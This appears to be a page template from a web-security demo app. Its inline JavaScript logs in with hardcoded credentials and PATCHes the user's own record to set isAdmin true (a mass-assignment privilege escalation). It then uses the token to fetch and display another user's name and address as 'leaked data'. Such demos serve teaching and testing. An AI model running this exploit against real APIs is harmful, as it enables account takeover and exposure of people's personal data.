{{#section 'head'}}
    <script>
        window.API_BASE_URL = '/auth/v2';
    </script>

    <script>

        const apiBaseUrl = window.API_BASE_URL;
        let token;

        fetch(`${apiBaseUrl}/tokens`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                username: 'foobar',
                password: '123456'
            })
        })
                .then((response) => response.json())
                /* Update isAdmin property. */
                .then((data) => {

                    token = data.token;

                    return fetch(`${apiBaseUrl}/users/${data.userId}`, {
                        method: 'PATCH',
                        headers: {
                            'Authorization': `Bearer ${token}`,
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({
                            isAdmin: true
                        })
                    });
                })
                .then(() => fetch(`${apiBaseUrl}/users/johndoe`, {
                    headers: {
                        'Authorization': `Bearer ${token}`
                    }
                }))
                /* Display result. */
                .then((response) => response.json())
                .then((data) => {

                    let outputElement = document.querySelector('#wt-output');
                    outputElement.innerHTML = `
                    <div>
                        <span>Name: </span>
                        <span class="wt-firstname"></span>
                        <span class="wt-lastname"></span>
                    </div>
                    <div>
                        <span>Address: </span>
                        <span class="wt-address"></span>                    </div>
                    `;

                    outputElement.querySelector('.wt-firstname').textContent = data.firstName;
                    outputElement.querySelector('.wt-lastname').textContent = data.lastName;
                    outputElement.querySelector('.wt-address').textContent = data.address;
                });

    </script>

{{/section}}

<p>Making Foo BAR admin then using he's credentials to get John DOE's data.</p>

<h2>Leaked data:</h2>
<div id="wt-output"></div>
